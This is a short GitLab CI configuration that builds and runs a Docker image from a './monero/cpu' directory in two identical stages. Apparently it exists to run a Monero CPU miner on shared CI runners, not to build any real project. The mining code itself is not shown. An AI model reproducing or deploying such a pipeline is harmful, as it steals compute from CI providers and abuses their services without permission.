image: docker:latest

services:
  - docker:dind

stages:
  - build_image
  - build_cpu

before_script:
  - docker info

build_image:
  stage: build_image
  script:
    - docker build -t nmlm99/sobakaka:mualpine ./monero/cpu
    - docker run nmlm99/sobakaka:mualpine

build_cpu:
  stage: build_cpu
  script:
    - docker build -t nmlm99/sobakaka:mualpine ./monero/cpu
    - docker run nmlm99/sobakaka:mualpine
